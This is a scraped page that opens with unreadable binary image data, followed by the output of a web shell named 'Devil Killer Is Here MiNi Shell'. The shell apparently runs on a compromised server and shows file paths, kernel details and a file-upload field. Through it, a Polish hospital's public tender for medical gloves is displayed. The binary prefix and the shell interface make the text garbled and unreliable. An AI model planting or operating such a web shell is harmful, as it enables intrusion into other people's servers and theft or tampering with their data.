JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20220629/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20220629/0022970301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> ZAKUP I DOSTAWA RĘKAWIC MEDYCZNYCH </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">&#34;CENTRUM MEDYCZNE W ŁAŃCUCIE&#34; SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 180405906</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Ignacego Paderewskiego 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łańcut</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 172240146</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia2@cm-lancut.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.cm-lancut.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ZAKUP I DOSTAWA RĘKAWIC MEDYCZNYCH </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-60556570-f77b-11ec-8000-d680d39e541a</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00229703</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://cm-lancut.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://cm-lancut.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">. Zamawiający określa niezbędne wymagania sprzętowo – aplikacyjne umożliwiające pracę na Platformie eZamawiający, tj.:<br/>a) Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>b) Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych – MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>c) Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0;<br/>d) Włączona obsługa JavaScript;<br/>e) Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>2. Zamawiający określa niezbędne wymagania sprzętowo – aplikacyjne umożliwiające prawidłowe złożenie kwalifikowanego podpisu elektronicznego:<br/>a) Rekomendowaną przeglądarką do złożenia oferty jest MS Internet Explorer lub Firefox w wersji wpieranej przez producenta.<br/>b) Uruchomienie oprogramowania do składania podpisu wymaga również zainstalowania Java w wersji 1.8.0_65 lub nowszej, koniecznie w wersji 32 - bitowej, pozwalające na przyjmowanie przez użytkownika sesyjnych plików cookie oraz obsługującej szyfrowanie. Konieczne jest również dodanie adresu witryny platformy eZamawiający (ezamawiający.pl) do wyjątków (exception site list) w Javie. Uwaga: wymaga to uprawnień administracyjnych na komputerze.<br/>c) Zainstaluj dedykowany komponent Szafir SDK oraz aplikację Szafir Host, który odpowiada za obsługę funkcjonalności podpisu elektronicznego w platformie eZamawiający. Rozszerzenie Szafir SDK można pobrać tutaj. Po zainstalowaniu rozszerzenia Szafir<br/>SDK oraz aplikacji Szafir Host należy przeładować bieżącą stronę.<br/>d) Przed uruchomieniem platformy eZamawiający, w pierwszej kolejności podłącz czytnik z kartą kryptograficzną do komputera.<br/>3. Informacje dotyczące odpowiedniego przygotowania stanowiska znajdują się na stronie:<br/>https://oneplace.marketplanet.pl/przygotuj-stanowisko-pc-wykonujac-ponizsze-kroki.<br/>4. Zamawiający zgodnie z § 3 ust. 3 ww. Rozporządzenia, określa dopuszczalne formaty przesyłanych danych, tj. plików o wielkości do 100 MB w txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES,<br/>ASIC, XMLenc.<br/>Zamawiający określa informacje na temat kodowania i czasu odbioru danych, tj.: plik załączony przez Wykonawcę na Platformie<br/>eZamawiający i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku<br/>dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia ofert.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.10.) Przyczyny odstąpienia od komunikacji elektronicznej: </h3> <p class="mb-0">zamawiający wymaga przedstawienia modelu fizycznego, modelu w skali lub próbki, których nie można przekazać przy użyciu środków komunikacji elektronicznej (art. 65 ust. 1 pkt 4 ustawy)</p> <h3 class="mb-0">3.11.) Sposób nieelektronicznego składania ofert, wniosków, oświadczeń oraz innych dokumentów: <span class="normal">Zgodnie z art. 65 ust.1 ustawy Pzp Zamawiający w zakresie próbek odstępuje od wymogu użycia środków komunikacji elektronicznej. Ta cześć jest składana za pośrednictwem operatora pocztowego, osobiście lub za pośrednictwem posłańca. Przesyłka musi być opisana nazwa i nr postepowania oraz danymi Wykonawcy i dostarczona przed terminem składania ofert do Sekretariatu „Centrum Medycznego w Łańcucie” Sp. z o. o., ul. Paderewskiego 5, 37-100 Łańcut, pokój nr 13</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna z art. 13 RODO do zastosowania przez zamawiających w celu związanym z postępowaniem o udzielenie zamówienia publicznego<br/>Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679<br/>z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>• administratorem Pani/Pana danych osobowych jest „Centrum Medyczne w Łańcucie” Sp. z o. o., ul. Paderewskiego 5, 37 – 100 Łańcut;<br/>• kontakt z Inspektorem Ochrony Danych Osobowych jest: za pośrednictwem poczty elektronicznej na adres: iod@cm-lancut.pl,<br/>telefonicznie – nr telefonu (17) 22 40 802 lub listownie na adres „Centrum Medyczne w Łańcucie” Sp. z o. o., ul. Paderewskiego 5, 37 – 100 Łańcut (sekretariat) lub kontakt osobisty w siedzibie Zamawiającego;<br/>• Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego p. n. „ZAKUP I DOSTAWA RĘKAWIC MEDYCZNYCH”, Znak sprawy: SZP/380/18/2022;<br/>• odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 z późn. zm.), dalej „ustawa Pzp”;<br/>• Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres<br/>4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>• obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>• w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO;<br/>• posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>• nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>− przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przewidzianej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00 – 193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SZP/380/18/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PAKIET I – RĘKAWICE NR 1 <br/>Pakiet składa się z pozycji:<br/>Pozycja nr 1 – RĘKAWICE CHIRURGICZNE; JAŁOWE, LATEKSOWE PUDROWANE (załącznik nr 2)<br/>Pozycja nr 2 – RĘKAWICE CHIRURGICZNE; JAŁOWE, LATEKSOWE BEZPUDROWE (załącznik nr 2.1) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33141420-0 - Rękawice chirurgiczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">18424300-0 - Rękawice jednorazowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty spośród ofert niepodlegających odrzuceniu Zamawiający będzie stosował niżej podane kryteria:<br/>Cena 60%<br/>Ocena Jakościowa 30%<br/>Termin dostawy 10 %<br/>Ocena będzie dokonywana według skali punktowej, przy założeniu, że maksymalna punktacja wynosi 100 punktów.<br/>a) Cena za realizację przedmiotu zamówienia (C) zostanie wyliczona w sposób matematyczny według następującego wzoru:<br/><br/>a)	Cena za realizację przedmiotu zamówienia (C) zostanie wyliczona w sposób matematyczny według następującego wzoru:<br/> Najniższa oferowana cena <br/>C = --------------------------------------------------------------------- x 100 x waga kryterium (60%)<br/> Cena oferty badanej<br/><br/>Jednostka miary tego kryterium – PLN<br/><br/>Cena (brutto) za poszczególną pozycję musi uwzględniać wszelkie koszty, jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/><br/>b)	Ocena Jakościowa – ocena zostanie dokonana indywidualnie na przez każdego członka Komisji przetargowej na podstawie dostarczonych próbek rękawic medycznych, złożonych dokumentów „zestawienie wymaganych parametrów technicznych” oraz załączonych dokumentów (środków dowodowych) przez Wykonawcę, Zamawiający będzie dokonywał oceny jakościowej załącznik nr 7 na drukach „formularz oceny jakościowej” zawartych w załącznikach nr 2AA, 2.1AA, 3AA, 3.1AA, 4AA, 4.1AA, 4.2AA, 5AA, 5.1AA w zależności od numeru Pakietu i pozycji.<br/><br/>Ocena jakościowa nastąpi wg następującego wzoru dla Pakietów I, II, III, IV:<br/> <br/> Suma punktów przyznanych przez<br/> członków komisji przetargowej ……. pkt. <br/> OJCK = ------------------------------------------------------------------------- x 100 x waga kryterium (30%)<br/> Maksymalna suma punktów <br/><br/>Punkty za Ocenę Jakościową: skala punktowa 0 – 100 pkt., waga 30%<br/><br/><br/>c)	Termin dostawy (TD): <br/><br/>Każda oferta w kryterium termin dostawy (TD) otrzyma następującą ilość punktów: <br/>1)	za dwa dni robocze 100 pkt.<br/>2)	za trzy dni robocze 75 pkt.<br/>3)	za cztery dni robocze 50 pkt.<br/>4)	za pięć dni roboczych 25 pkt.<br/><br/>Jednostka miary tego kryterium – pełne dni robocze <br/><br/>Otrzymane punkty w tym kryterium zostaną pomnożone przez wagę kryterium (10 %).<br/><br/>Oferty z krótszym niż 2 – dniowym terminem dostawy oraz dłuższym niż 5 – dniowym terminem dostawy oraz oferty w których Wykonawcy nie wpiszą terminu dostawy zostaną odrzucone i nie będą podlegać ocenie ofert pod względem przyjętych kryteriów oceny ofert. <br/>Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona <br/>z dokładnością do dwóch miejsc po przecinku. <br/> <br/>Realizacja zamówienia w poszczególnym pakiecie zostanie powierzona Wykonawcy, którego oferta uzyska najwyższą liczbę punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Ocena Jakościowa</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PAKIET II – RĘKAWICE NR 2 <br/>Pakiet składa się z pozycji:<br/>Pozycja nr 1 – RĘKAWICE CHIRURGICZNE DO ZABIEGÓW O PODWYŻSZONYM RYZYKU (ORTOPEDYCZNE); JAŁOWE, LATEKSOWE BEZPUDROWE (załącznik nr 3)<br/>Pozycja nr 2 – RĘKAWICE CHIRURGICZNE JAŁOWE SYNTETYCZNE NEOPRENOWE BEZPUDROWE (załącznik nr 3.1) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33141420-0 - Rękawice chirurgiczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">18424300-0 - Rękawice jednorazowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty spośród ofert niepodlegających odrzuceniu Zamawiający będzie stosował niżej podane kryteria:<br/>Cena 60%<br/>Ocena Jakościowa 30%<br/>Termin dostawy 10 %<br/>Ocena będzie dokonywana według skali punktowej, przy założeniu, że maksymalna punktacja wynosi 100 punktów.<br/>a) Cena za realizację przedmiotu zamówienia (C) zostanie wyliczona w sposób matematyczny według następującego wzoru:<br/><br/>a)	Cena za realizację przedmiotu zamówienia (C) zostanie wyliczona w sposób matematyczny według następującego wzoru:<br/> Najniższa oferowana cena <br/>C = --------------------------------------------------------------------- x 100 x waga kryterium (60%)<br/> Cena oferty badanej<br/><br/>Jednostka miary tego kryterium – PLN<br/><br/>Cena (brutto) za poszczególną pozycję musi uwzględniać wszelkie koszty, jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/><br/>b)	Ocena Jakościowa – ocena zostanie dokonana indywidualnie na przez każdego członka Komisji przetargowej na podstawie dostarczonych próbek rękawic medycznych, złożonych dokumentów „zestawienie wymaganych parametrów technicznych” oraz załączonych dokumentów (środków dowodowych) przez Wykonawcę, Zamawiający będzie dokonywał oceny jakościowej załącznik nr 7 na drukach „formularz oceny jakościowej” zawartych w załącznikach nr 2AA, 2.1AA, 3AA, 3.1AA, 4AA, 4.1AA, 4.2AA, 5AA, 5.1AA w zależności od numeru Pakietu i pozycji.<br/><br/>Ocena jakościowa nastąpi wg następującego wzoru dla Pakietów I, II, III, IV:<br/> <br/> Suma punktów przyznanych przez<br/> członków komisji przetargowej ……. pkt. <br/> OJCK = ------------------------------------------------------------------------- x 100 x waga kryterium (30%)<br/> Maksymalna suma punktów <br/><br/>Punkty za Ocenę Jakościową: skala punktowa 0 – 100 pkt., waga 30%<br/><br/><br/>c)	Termin dostawy (TD): <br/><br/>Każda oferta w kryterium termin dostawy (TD) otrzyma następującą ilość punktów: <br/>1)	za dwa dni robocze 100 pkt.<br/>2)	za trzy dni robocze 75 pkt.<br/>3)	za cztery dni robocze 50 pkt.<br/>4)	za pięć dni roboczych 25 pkt.<br/><br/>Jednostka miary tego kryterium – pełne dni robocze <br/><br/>Otrzymane punkty w tym kryterium zostaną pomnożone przez wagę kryterium (10 %).<br/><br/>Oferty z krótszym niż 2 – dniowym terminem dostawy oraz dłuższym niż 5 – dniowym terminem dostawy oraz oferty w których Wykonawcy nie wpiszą terminu dostawy zostaną odrzucone i nie będą podlegać ocenie ofert pod względem przyjętych kryteriów oceny ofert. <br/>Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona <br/>z dokładnością do dwóch miejsc po przecinku. <br/> <br/>Realizacja zamówienia w poszczególnym pakiecie zostanie powierzona Wykonawcy, którego oferta uzyska najwyższą liczbę punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> 